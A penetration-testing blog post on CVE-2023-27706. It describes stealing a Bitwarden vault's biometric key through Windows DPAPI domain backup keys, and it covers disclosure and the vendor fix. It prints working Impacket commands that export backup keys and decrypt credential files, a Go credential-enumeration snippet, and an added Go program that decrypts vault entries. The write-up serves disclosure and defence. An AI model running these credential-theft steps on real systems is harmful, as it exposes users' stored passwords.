RedTeam Pentesting – Weblog – Bitwarden Heist

3 January 2024

Bitwarden Heist – How to Break Into Password Vaults Without Using Passwords

Sometimes, making specific security design decisions can have unexpected consequences. For security-critical software, such as password managers, this can easily lead to catastrophic failure: In this blog post, we show how Bitwarden's Windows Hello implementation allowed us to remotely steal all credentials from the vault without knowing the password or requiring biometric authentication. When we discovered this during a penetration test, it was so unexpected for us that we agreed with our client to publish a blog post about it and tell the story.

The underlying issue has been fixed in Bitwarden v2023.4.0 in April 2023 (but the story is interesting nonetheless).

[Image: Windows logo on a blue shield in front of an open vault]

Where We Started

We recently performed a penetration test with the goal of compromising the internal network of a client in a Windows environment. As usual, we managed to get administrative access to the domain controller; however, there was an additional hurdle: The backup server, one of the prioritized targets, did not reside within the domain. Having already gained access to Domain Administrator accounts, we decided to have a look around their Windows workstations in the hope of uncovering information that might grant us access to the backup system. Looking at the workstations, we found that passwords appeared to be stored using Bitwarden (the following details apply to version Desktop v2023.3.0 of the software). We made the assumption that credentials for the backup system might be found in the Bitwarden vault of the employees responsible for the IT infrastructure. After consulting with our client, we got permission to attempt to retrieve the contents of one of these vaults. Since we did not want to potentially disrupt the client's business by using invasive techniques such as keyloggers to gain access to the backup system, we looked for an unintrusive approach that, if possible, did not rely on end-user interaction.

We first tried to crack the vault using simple credential stuffing attacks; however, this remained unsuccessful, leading us to eventually attempt a more creative approach. To further analyze the vault, we decided to download Bitwarden's main storage file in the hope of finding anything of note. It is located under the user's home directory at %AppData%\Bitwarden\data.json. Downloading the JSON file and opening it in a text editor already revealed an unexpected finding:

		"openAtLogin": false,
		"enableBiometrics": true,
		"biometricText": "unlockWithWindowsHello",
		"noAutoPromptBiometricsText": "autoPromptWindowsHello",
		"installedVersion": "2023.3.0",
        [...]
			"avatarColor": null,
			"biometricUnlock": true
		},
		"tokens": {

It appeared that this Bitwarden vault could be opened using biometrics, and Windows Hello in particular. We had the feeling that it might be worth looking at, so we decided to dig deeper.

Biometric Unlock – How Does it Work?

Even when biometrics are enabled, the vault still has a main password (Bitwarden calls it master password); you simply do not have to enter it every time to unlock the vault. This begs the question how the vault is secured if you do not have to enter the master password. Well, the vault is not actually encrypted with the master password, but with an account encryption key, which is itself stored in encrypted form within the vault. The key for decrypting the account encryption key is derived from the main password chosen during vault creation.

In other words: When a user enters their main password, Bitwarden derives a key from the password, and this key is then used to decrypt the actual account encryption key, which in turn can decrypt the credentials stored in the vault.

The key derived from the main password will be called derived key from now on, and it is exactly where the biometric unlock comes into play. At this point, users can choose to add additional unlock mechanisms, which usually results in an encrypted copy of the derived key being stored at a (hopefully) safe location from which it can be retrieved using biometrics, for example. Consequently, whoever can retrieve and decrypt the derived key does not need a password to access the vault.

The biometric unlock described above is implemented based on Windows Hello on Windows machines. Consequently, activating biometric login on Windows means that the derived key is encrypted locally using a secret which can be retrieved after authentication via Windows Hello. So far so good, but as it turns out, it is very much worthwhile to take a closer look into how this is actually implemented in Bitwarden.

After some digging, we found that Bitwarden stored the encrypted copy of the derived key using the Windows Credentials API by calling windows::win32::Credentials::CredWriteW in the bitwarden/clients Rust code. Unfortunately, the documentation on how these credentials are protected is meager, to say the least, which makes it complicated to actually understand what is happening when the API is used. It appears as if CredWriteW creates credentials using the Credential Manager, which in turn seems to invoke the lower-level Data Protection API (DPAPI). DPAPI provides a convenient way to store data securely such that only the given user is able to retrieve the data at a later point in time. The differences between protecting credentials via the Credential Manager and DPAPI are somewhat unclear; however, using the Credential Manager seems to provide additional benefits over using the low-level API, for example UI visibility (you can check this yourself by searching for the Credential Manager application in your Windows Start menu).

So in order to decrypt the Bitwarden vault, we either need to know the main password in order to compute the derived key on the fly, or we need to retrieve the derived key from the depths of the encrypted DPAPI storage. We knew that DPAPI has lots of ties to the Active Directory that are relevant for domain-joined workstations, and we had already compromised the client's Active Directory, so we chose the latter approach.

Robbing the Vault Remotely – Who Needs a Master Password, Anyway?

We soon learned about an awfully convenient feature of DPAPI, or rather its newer version DPAPI-NG, on domain-joined workstations:

Typically, domain users encrypt DPAPI-protected data using keys that are derived from their own passwords. However, if the user forgets their password, or if their password is administratively reset or reset from another device, the previously encrypted data can no longer be decrypted using the new keys derived from the user's new password. When this occurs, the data can still be decrypted using the Backup keys stored on the Active Directory domain controllers. They can then be re-encrypted with the user's new password-derived key. This means that anyone who has the DPAPI Backup keys for a domain will be able to decrypt DPAPI-encrypted data for any domain user, even after the user's password is changed.

This means, for one, that the data is encrypted using the password of the domain user and no direct involvement of Windows Hello is required to decrypt it (as long as the user's password is known). Furthermore, the data can additionally be decrypted with a remote backup key stored on the domain controller. What could possibly go wrong?

Since the workstation running Bitwarden was domain-joined and the domain was already compromised, we started looking for DPAPI keys in order to exploit this mechanism. First, we need to obtain whatever DPAPI stores on the machine itself.

We quickly found that two directories were of particular relevance to us: %AppData%\Microsoft\Protect, which is used to securely store the DPAPI decryption keys, and %AppData%\Microsoft\Credentials, where the protected data resides. Note that we use some simplifications involving the creation of session keys in DPAPI since they are of no relevance to this blog post; details are available here.

If you open these directories in the Explorer, you won't see anything because they are hidden in a way that Explorer won't even show them when "Show hidden files" is enabled. However, the PowerShell command Get-ChildItem or gci can display them when adding -Force or -Hidden. They are also visible via SMB, and as we already had remote administrator access, we chose this path.

The following code snippets are taken from our lab environment, but are closely based on the actual penetration test. First, we obtained the required Bitwarden data file using smbclient from the Impacket project:

$ smbclient.py 'LAB/Administrator:<password>@workstation.lab'
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

Type help for list of commands
# use C$
# get Users\user1\AppData\Roaming\Bitwarden\data.json

In the same session, we also downloaded the Credentials and Protect data:

# cd Users\user1\AppData\Roaming\Microsoft\Credentials
# ls
drw-rw-rw-          0  Tue Nov 28 12:59:46 2023 .
drw-rw-rw-          0  Tue Nov 28 12:59:46 2023 ..
-rw-rw-rw-        686  Tue Nov 28 14:02:38 2023 C6530B1481D73604A6A51D114372F1AA
# get C6530B1481D73604A6A51D114372F1AA
# cd ..
# cd Protect
# ls
drw-rw-rw-          0  Mon Nov 27 09:59:01 2023 .
drw-rw-rw-          0  Mon Nov 27 09:59:01 2023 ..
-rw-rw-rw-         24  Mon Nov 27 09:58:51 2023 CREDHIST
drw-rw-rw-          0  Mon Nov 27 09:58:51 2023 S-1-5-21-505269936-2602674991-4082112561-1105
-rw-rw-rw-         76  Mon Nov 27 09:59:01 2023 SYNCHIST
# cd S-1-5-21-505269936-2602674991-4082112561-1105
# ls
drw-rw-rw-          0  Mon Nov 27 09:58:51 2023 .
drw-rw-rw-          0  Mon Nov 27 09:58:51 2023 ..
-rw-rw-rw-        740  Mon Nov 27 09:58:51 2023 14c8d0db-8c7c-4bf8-a857-eb20500a3893
-rw-rw-rw-        904  Mon Nov 27 09:58:51 2023 BK-LAB
-rw-rw-rw-         24  Mon Nov 27 09:58:51 2023 Preferred
# get 14c8d0db-8c7c-4bf8-a857-eb20500a3893
# exit

Downloading these files made it possible to work on the decryption process locally; however, it also meant that we did not gain access to the user's main decryption password directly. This is where the handy feature of decrypting DPAPI decryption keys using backup keys comes into play, as we know that it is possible to decrypt these local secrets with the backup key from the domain controller. We could conveniently download it using the dpapi.py script from the Impacket project:

$ dpapi.py backupkeys -t 'LAB/Administrator:<password>@dc.lab' --export

In this case, we renamed the key to backupkey.pvk. Using this newly acquired key, we could start by decrypting the protected DPAPI decryption key (the master key file) that we took from the workstation:

$ dpapi.py masterkey -pvk backupkey.pvk -file ./14c8d0db-8c7c-4bf8-a857-eb20500a3893
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 14c8d0db-8c7c-4bf8-a857-eb20500a3893
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with domain backup key provided
Decrypted key: 0xad69553beafe0c5bcaf3b61a61136da64c50c57406f3649c6f70c11dc8d22a09d87241bd769ddbcb022a64744cbcd28342176593da30c825a0a56105496f0d5a

It was now simply a matter of using this key to decrypt the biometric login credentials which are necessary to get into the Bitwarden vault:

$ dpapi.py credential -f ./C6530B1481D73604A6A51D114372F1AA -key 0xad69553beafe0c5bcaf3b61a61136da64c50c57406f3649c6f70c11dc8d22a09d87241bd769ddbcb022a64744cbcd28342176593da30c825a0a56105496f0d5a
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

[CREDENTIAL]
LastWritten : 2023-11-28 14:02:38
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=Bitwarden_biometric/ea0b6061-4381-4534-9e91-50cf98753530_masterkey_biometric
Description :
Unknown     :
Username    : ea0b6061-4381-4534-9e91-50cf98753530_masterkey_biometric
Unknown     : "6PN6Y9wkXjrHvDCijM7fhkNrDL8PI/dc70m9XoSqxDE="

This revealed the biometric key (a copy of the previously described derived key), which grants access to the Bitwarden vault:
6PN6Y9wkXjrHvDCijM7fhkNrDL8PI/dc70m9XoSqxDE=

This means that we don't need the main password, we don't need the fingerprint for biometrics, and we don't even have to use a keylogger or dump Bitwarden's process memory. This also means that we don't have to struggle with endpoint protection, and we don't need to wait for the actual user to unlock the vault. We simply have to use DPAPI as it was designed. We seriously doubt any user is aware of these implications when enabling Windows Hello for their vault.

So far we have only shown the derived/biometric key, which is sufficient to decrypt the vault. In practice, however, there is still a bit of legwork we have to do. After all, our goal was not to demonstrate that we could decrypt the vault but to get actual credentials from the vault.

Breaking Into the Vault

We first had to figure out how to decrypt the Bitwarden account encryption key, which protects all other information in the vault. Credentials are not always encrypted with the account encryption key directly, since Bitwarden also supports usage scenarios where some credentials should be shared in an organization, for example. This is solved by adding additional layers of keys (private and organizational keys), which are used to encrypt organization credentials and are themselves protected using the account encryption key. Take a look at the figure below if you are starting to get confused about all the keys involved in this story.

[Figure: Overview of keys]

The decryption process therefore consists of three main steps: (1) decryption of the account encryption key using the biometric key, (2) decryption of the second layer of keys using the account encryption key, and (3) decryption of the credentials using either the account encryption key or one of the intermediate keys. We then set out to write a Python script to automate the decryption. Let's walk through each step:

  1. We started by extracting the user object from the Bitwarden data file
    data.json. The user object contains the encrypted credentials (in the
    data section) and the encryption keys (in the keys section), in addition
    to (unencrypted) information about the user account like the email address
    (profile), settings like the web vault URL (settings) and more. The
    user section can be identified by searching for a UUID which is used as key
    in the JSON object:

    "ea0b6061-4381-4534-9e91-50cf98753530": {
        "data": {
            [...]
        "keys": {
            "cryptoSymmetricKey": "rB5YmxVMKo9tJtNSmRT8mpVQu7GEAHhKndJBXKBwWfW1rw6i3x003ZPligtJCmWXpdHIryF2fb5KdETAvr9QLws27A8z3ZAO4KNAgrzGH14=",
            [...]
    

    Since Bitwarden uses different kinds of encryption for different scenarios,
    all encrypted values are stored using a particular format, which starts with
    an encryption type identifier (from
    GitHub
    ):

    export enum EncryptionType {
      AesCbc256_B64 = 0,
      AesCbc128_HmacSha256_B64 = 1,
      AesCbc256_HmacSha256_B64 = 2,
      Rsa2048_OaepSha256_B64 = 3,
      Rsa2048_OaepSha1_B64 = 4,
      Rsa2048_OaepSha256_HmacSha256_B64 = 5,
      Rsa2048_OaepSha1_HmacSha256_B64 = 6,
    }
    
    /** [...]
     * Example of annotated serialized EncStrings:
     * 0.iv|data
     * 1.iv|data|mac
     * 2.iv|data|mac
     * 3.data
     * 4.data
     [...]
    

    As indicated by the leading 2, our account encryption key was encrypted
    using AES-CBC-256 and integrity-protected using an HMAC based on SHA-256.
    Before decrypting the account key with the biometric key, the biometric key
    has to be expanded using HKDF-expand, though.

  2. With the account encryption key, we were able to decrypt the second layer of
    keys, which were all stored in the "keys" part of the user object as well.

        "privateKey": [...]
    

    As can be inferred from the encryption type, this key was also encrypted
    using AES-CBC. In our test setup, the private RSA key could be used to
    decrypt additional organizational keys, which were in turn required to
    access organization-specific credentials.

  3. Having obtained all intermediate keys, we were finally able to extract the
    desired credentials:

    "46d9d1c2-7595-4c18-989d-053e1bf5336f": {
        "id": "46d9d1c2-7595-4c18-989d-053e1bf5336f",
        "organizationId": null,
        [...]
        "login": {
            "username": "2.Ok+/iMJyO27Wzqos4JtTfmA==|FB1cyKstIHGPBx4GBRk651FZ1zr3NpLBEoe1Vf3FFe4=|Y/2Kur7jIvI/ecXA64ARKs6qy7zLXJh9NVC81+uyeiI=",
            "password": "2.ALOh5YroSqPCkoyzviK0/g==|FDzMel84he7OPGGLatBgxw==|fVxA3OIeNkLwH3zzDU66F40ykDD0PGUOBSEcpMlp3w8=",
            [...]
    

    Such a credential could be decrypted using the account key directly
    (recognizable by the empty organizationId).

    Other credentials required intermediate keys (organizationId is set):

    "fad536b0-0b44-4cf2-8741-bca6ce7881d0": {
        "id": "fad536b0-0b44-4cf2-8741-bca6ce7881d0",
        "organizationId": "1d05eff7-8a52-44b1-a004-9835dc485985",
        [...]
        "login": {
            "username": null,
            "password": "2.qiVz94La8KSO+GaLbUHjGw==|Khqd0v88X8SqC2gTTrQMtQ==|PYFaG7+X9rL8LZUzbo1T3xIATDAOlybnN3tviBST3/c=",
            [...]
    

Now we can see our vault decryption script in action:

[Figure: Terminal output of running the Python script to decrypt credentials]
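The authors' Python script is only shown as a screenshot, so the following Go program is an added example written for this page (it is neither the authors' script nor Bitwarden's own code) that carries the key chain from the "Biometric Unlock – How Does it Work?" section and steps 1 to 3 above through for a credential with an empty organizationId. It assumes the type-2 EncString layout shown above (2.iv|data|mac, base64-encoded, HMAC-SHA256 over iv||data) and the key stretching Bitwarden's clients use for a 32-byte key, HKDF-expand with the info strings "enc" and "mac". All key material and vault entries are constructed inline, so it runs offline; the organization-key layer (RSA private key) is left out.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"strings"
)

// SymKey is a Bitwarden symmetric key: 32 bytes for AES-256-CBC, 32 for HMAC-SHA256.
type SymKey struct{ Enc, Mac []byte }

// hkdfExpand32 is one block of the RFC 5869 expand step with HMAC-SHA256,
// T(1) = HMAC(PRK, info || 0x01). The input key is used as PRK directly, and a
// single block already yields the 32 bytes each key half needs.
func hkdfExpand32(prk []byte, info string) []byte {
	m := hmac.New(sha256.New, prk)
	m.Write([]byte(info))
	m.Write([]byte{1})
	return m.Sum(nil)
}

// StretchKey turns a 32-byte key (here: the biometric/derived key) into the
// enc/mac pair a type-2 EncString needs; "enc"/"mac" are the info strings
// Bitwarden's clients use for this step.
func StretchKey(key []byte) SymKey {
	return SymKey{Enc: hkdfExpand32(key, "enc"), Mac: hkdfExpand32(key, "mac")}
}

// tag computes the HMAC over iv||ciphertext (encrypt-then-MAC).
func tag(key SymKey, iv, ct []byte) []byte {
	m := hmac.New(sha256.New, key.Mac)
	m.Write(iv)
	m.Write(ct)
	return m.Sum(nil)
}

// Encrypt builds a type-2 EncString "2.iv|data|mac"; it exists only to construct
// the sample entries below. Key lengths are fixed by StretchKey/the 64-byte split.
func Encrypt(plain []byte, key SymKey) string {
	block, _ := aes.NewCipher(key.Enc)
	iv := make([]byte, aes.BlockSize)
	rand.Read(iv)
	pad := aes.BlockSize - len(plain)%aes.BlockSize // PKCS#7
	padded := append(append([]byte{}, plain...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	b64 := base64.StdEncoding.EncodeToString
	return "2." + b64(iv) + "|" + b64(ct) + "|" + b64(tag(key, iv, ct))
}

// Decrypt parses a type-2 EncString, verifies the HMAC first and only then runs
// AES, so a wrong key or a tampered blob is rejected before any decryption.
func Decrypt(enc string, key SymKey) ([]byte, error) {
	typ, rest, _ := strings.Cut(enc, ".")
	parts := strings.Split(rest, "|")
	if typ != "2" || len(parts) != 3 {
		return nil, fmt.Errorf("not a type-2 iv|data|mac EncString")
	}
	dec := base64.StdEncoding.DecodeString
	iv, e1 := dec(parts[0])
	ct, e2 := dec(parts[1])
	mac, e3 := dec(parts[2])
	if e1 != nil || e2 != nil || e3 != nil {
		return nil, fmt.Errorf("malformed base64 in EncString")
	}
	if !hmac.Equal(tag(key, iv, ct), mac) {
		return nil, fmt.Errorf("HMAC verification failed")
	}
	block, err := aes.NewCipher(key.Enc)
	if err != nil || len(iv) != aes.BlockSize || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("bad key, iv or ciphertext length")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || pad > len(pt) {
		return nil, fmt.Errorf("bad PKCS#7 padding")
	}
	return pt[:len(pt)-pad], nil
}

// UnlockField walks the chain from the biometric key to one vault field: stretch
// the biometric key, open cryptoSymmetricKey, split the 64-byte result into
// enc||mac (no further derivation), open the field.
func UnlockField(biometricKey []byte, cryptoSymmetricKey, field string) ([]byte, error) {
	accountRaw, err := Decrypt(cryptoSymmetricKey, StretchKey(biometricKey))
	if err != nil {
		return nil, fmt.Errorf("account encryption key: %w", err)
	}
	if len(accountRaw) != 64 {
		return nil, fmt.Errorf("account encryption key: expected 64 bytes, got %d", len(accountRaw))
	}
	return Decrypt(field, SymKey{Enc: accountRaw[:32], Mac: accountRaw[32:]})
}

func main() {
	biometric, account := bytes.Repeat([]byte{0x42}, 32), bytes.Repeat([]byte{0x07}, 64) // constructed
	cryptoSymmetricKey := Encrypt(account, StretchKey(biometric))
	password := Encrypt([]byte("hunter2"), SymKey{Enc: account[:32], Mac: account[32:]})
	pt, err := UnlockField(biometric, cryptoSymmetricKey, password)
	fmt.Printf("decrypted: %q, err: %v\n", pt, err)
}
```

Because the MAC is checked before any AES call, feeding a wrong biometric key fails with an HMAC error instead of yielding garbage; a type-0 EncString (no MAC) is rejected outright rather than silently decrypted.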

As we had hoped, the Bitwarden vault on the Administrator's workstation did indeed include the credentials to access the specific backup system, finally granting us access to the sought-after backups. You can probably imagine the astonishment of our client when we told them about the attack, as they had no idea that domain admins can bypass Bitwarden's vault protections.

Well, we've always known that attackers with domain admin privileges are quite powerful in the first place, but at least the vault is protected against unprivileged attackers on the local workstation, right? …right?

But Wait, There's More: Who Needs Biometrics, Anyway?

In the process of trying to understand this whole mechanism, we started playing around with DPAPI in our lab setup. For example, we thought that using the API itself could be easier than cobbling together the key files from %AppData%. To familiarize ourselves with DPAPI, we wrote a tiny Go program to see what credentials are stored in DPAPI on the workstation using the wincred library. The full script is available here, but the only interesting lines are these:

// Enumerate every credential in the current user's credential set.
creds, err := wincred.List()
if err != nil {
    return fmt.Errorf("wincred list: %w", err)
}

for _, cred := range creds {
    // The blob is usually UTF-16LE text; fall back to a quoted byte string otherwise.
    credentialBlob, err := decodeUTF16LE(cred.CredentialBlob)
    if err != nil {
        credentialBlob = fmt.Sprintf("%q", string(cred.CredentialBlob))
    }

    fmt.Printf("%s:\n    * %s\n", cred.UserName, credentialBlob)
}

It only calls wincred.List(), which is a thin Go wrapper around CredEnumerateW, which simply "enumerates the credentials from the user's credential set". However, we did not expect this function to immediately spit out Bitwarden's derived/biometric key without prompting for biometric authentication using Windows Hello:

[Figure: Terminal output of the Go program that lists DPAPI credentials]

This means that any process running in the low-privileged user's session can simply ask DPAPI for the credentials to unlock the vault, no questions asked, no PIN or fingerprint prompt required, and Windows Hello is not even involved at all. The only caveat is that this does not work for other user accounts.

Bitwarden itself does prompt for biometric authentication when unlocking the vault, but it wouldn't even have to. In fact, you could probably remove a few lines from the source code and have it unlock with no prompt. The whole issue is probably a result of misunderstanding the details of the CredWriteW function, or maybe an unawareness of the potential pitfalls of using DPAPI to store encryption keys.

A Feature, Not a Bug

We contacted both Bitwarden and Microsoft about the details of this attack. We always make sure to follow industry best practices for responsible disclosure, even if it is unclear whether our findings are actual vulnerabilities. For the attack explained in this blog post, this was the case, as it is not clear whether the attack is in scope of either Bitwarden (since the attack already assumes access to the victim's workstation and the Windows domain) or Microsoft (who are only involved by providing DPAPI to store the decryption keys). Microsoft indeed responded to our report by stating that DPAPI and its backup mechanism were used exactly as intended, and that our attack therefore did not indicate any vulnerabilities on their side.

Bitwarden also responded; they agreed that this behavior was unintended and stated that they were already tracking a similar issue internally. As it turns out, we were not the first to discover this: in March 2023, it had already been reported to Bitwarden via HackerOne. However, we did not know this, as it was only disclosed in June 2023. Since then, the vulnerability is known as CVE-2023-27706.

Bitwarden has since made changes to their codebase to mitigate this particular issue, which we will briefly summarize in the next section. They have also changed the default setting when using Windows Hello as login feature to require entering the main password at least once when Bitwarden is started.

Biometrics in Bitwarden Now

To prepare for this blog post, we also took a look at how credentials are stored in the current version of Bitwarden Desktop v2023.10.1. Bitwarden still uses Windows Hello and DPAPI, which are still accessible using the domain backup key. However, the content of the secured data blobs has changed:

$ dpapi.py credential -f DAF81666731C8E899E9464647512792B -key 0xad69553beafe0c5bcaf3b61a61136da64c50c57406f3649c6f70c11dc8d22a09d87241bd769ddbcb022a64744cbcd28342176593da30c825a0a56105496f0d5a
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

[CREDENTIAL]
LastWritten : 2023-11-28 15:01:47
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=Bitwarden_biometric/ea0b6061-4381-4534-9e91-50cf98753530_user_biometric
Description :
Unknown     :
Username    : ea0b6061-4381-4534-9e91-50cf98753530_user_biometric
Unknown     : 0.OQeotvzeRCpHoEb2c7TZ2g==|3PqjMDiq1J9hHnO7KESu0fG6Vl4yl2siOImoZghma2FpfNJmfKyGAmJNq00ay3/HV1dd855YMlNc7k3wSam47nxWEAuQU/oCaiPH9q5k9I+OJuvv01HVniqq7ERzRWLp

$ dpapi.py credential -f 1A52DC5CA68038A3E4216121AA1A7E0E -key 0xad69553beafe0c5bcaf3b61a61136da64c50c57406f3649c6f70c11dc8d22a09d87241bd769ddbcb022a64744cbcd28342176593da30c825a0a56105496f0d5a
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

[CREDENTIAL]
LastWritten : 2023-11-28 15:01:47
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=Bitwarden_biometric/ea0b6061-4381-4534-9e91-50cf98753530_user_biometric_witness
Description :
Unknown     :
Username    : ea0b6061-4381-4534-9e91-50cf98753530_user_biometric_witness
Unknown     : 0.OQeotvzeRCpHoEb2c7TZ2g==|Kbo2ptPoXcw3N30AnYA8fw==

Instead of storing the valuable derived/biometric key via DPAPI, Bitwarden now stores two secured data blobs, which are encrypted and can no longer be used to decrypt the account encryption key directly (indicated by the encryption type 0). The stored data blobs are now additionally encrypted using the KeyCredentialManager API, which actually requires interaction with Windows Hello to produce a decryption key. While it seems to us that this fixes the issue, we have not actually examined the new implementation for other vulnerabilities yet.



